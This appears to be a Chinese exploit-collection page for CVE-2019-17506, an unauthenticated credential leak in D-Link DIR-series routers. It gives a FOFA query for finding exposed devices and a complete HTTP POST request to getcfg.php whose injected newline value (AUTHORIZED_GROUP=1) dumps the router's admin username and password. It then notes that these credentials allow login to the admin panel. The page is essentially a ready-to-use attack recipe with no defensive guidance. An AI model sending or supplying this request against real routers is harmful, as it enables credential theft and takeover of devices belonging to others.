# D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

D-Link DIR-868L B1-2.03和DIR-817LW A1-1.04路由器上有一些不需要身份验证的Web界面。攻击者可以通过SERVICES的DEVICE.ACCOUNT值以及AUTHORIZED\_GROUP = 1％0a来获取getcfg.php的路由器的用户名和密码（以及其他信息）。这可用于远程控制路由器

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

D-Link Dir 系列多个版本

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

app="D\_Link-DIR-868L"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr0ZKsvrrOfwlGU3S0%2Fimage.png?alt=media\&token=fb1a26a7-ed27-49a2-bcba-b506109e0072)

发送如下请求包

```
POST /getcfg.php HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 61

SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr0bdWFb9bKB0isRu5%2Fimage.png?alt=media\&token=890ab61b-c822-4b39-807f-7c157fe88eda)

获取到路由器账号密码即可登录后台